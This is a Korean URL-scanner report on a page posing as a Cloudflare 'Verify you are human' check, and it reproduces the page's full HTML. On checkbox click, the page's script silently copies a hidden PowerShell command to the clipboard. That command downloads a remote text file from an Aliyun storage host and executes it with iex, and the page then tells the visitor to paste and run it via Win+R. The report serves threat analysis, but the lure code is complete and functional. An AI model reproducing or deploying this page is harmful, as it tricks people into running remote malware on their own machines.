- 제출된 URL:
- https://sos-de-muc-1.exo.io/everything-here/cloudflare-v1-getup-11-1.html
- 보고서 완료:
링크 · 0개 결과
페이지에서 식별된 외부 링크
JavaScript 변수 · 3개 결과
페이지의 창 개체에 로드된 전역 JavaScript 변수는 함수 외부에서 선언된 변수로, 현재 범위 내에서 코드의 어느 부분에서나 액세스할 수 있습니다
이름 | 유형 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
콘솔 로그 메시지 · 1개 결과
웹 콘솔에 기록된 메시지
유형 | 카테고리 | 로그 |
---|---|---|
error | network |
|
HTML
페이지의 원시 HTML 본문
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Security Check</title>
<style>
body, html { margin: 0; padding: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; font-family: Arial, sans-serif; transition: background-color 0.3s, color 0.3s; }
body { background-color: #f9f9f9; color: #333; }
.captcha-container, .popup { background: #fff; border: 1px solid #d1d1d1; color: #333; }
@media (prefers-color-scheme: dark) {
body { background: #1c1c1e; color: #e5e5e7; }
.captcha-container, .popup { background: #2c2c2e; border-color: #3a3a3c; color: #e5e5e7; }
}
.dimmable-container { position: relative; z-index: 10; transition: opacity 0.3s; }
.dimmed { opacity: 0.2; }
.captcha-container {
text-align: center; max-width: 400px; padding: 40px; border-radius: 8px;
box-shadow: 0 2px 6px rgba(0, 0, 0, 0.15); display: flex; flex-direction: column; align-items: center;
}
.captcha-title { font-size: 20px; font-weight: bold; margin-bottom: 10px; }
.captcha-subtitle { font-size: 14px; margin-bottom: 25px; }
.captcha-checkbox {
display: flex; align-items: center; border: 1px solid #3a3a3c; padding: 15px; border-radius: 5px;
width: 100%; max-width: 280px; justify-content: space-between; cursor: pointer;
}
.captcha-checkbox input[type="checkbox"] { width: 20px; height: 20px; margin-right: 10px; transform: scale(1.3); }
.captcha-checkbox img { max-width: 80px; height: auto; } /* Responsive logo */
.captcha-footer { font-size: 12px; color: #999; margin-top: 30px; }
.overlay { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.6); z-index: 5; }
.popup {
display: none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); padding: 20px;
border-radius: 8px; width: 300px; text-align: center; box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3); z-index: 100;
}
</style>
</head>
<body>
<div class="overlay" id="overlay"></div>
<div class="dimmable-container" id="dimmableContainer">
<div class="captcha-container">
<h1 class="captcha-title">Verify you are human</h1>
<p class="captcha-subtitle">Verify you are human by completing the action below.</p>
<label class="captcha-checkbox">
<input type="checkbox" id="captchaCheckbox">
<span>Verify you are human</span>
<img src="https://www.cloudflare.com/img/logo-cloudflare-dark.svg" alt="Cloudflare">
</label>
<div class="captcha-footer">Performance & security by Cloudflare</div>
</div>
</div>
<div class="popup" id="popup">
<h3>Verification Steps</h3>
<p>1. Press Windows Button "⊞" + R</p>
<p>2. Press CTRL + V</p>
<p>3. Press Enter</p>
</div>
<script>
document.getElementById('captchaCheckbox').addEventListener('click', () => {
const code = "powershell.exe -W Hidden -command $url = 'https://zip-store.oss-ap-southeast-1.aliyuncs.com/updated%20file/getup.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text";
navigator.clipboard.writeText(code).then(() => {
document.getElementById('overlay').style.display = 'block';
document.getElementById('popup').style.display = 'block';
document.getElementById('dimmableContainer').classList.add('dimmed');
});
});
</script>
</body></html>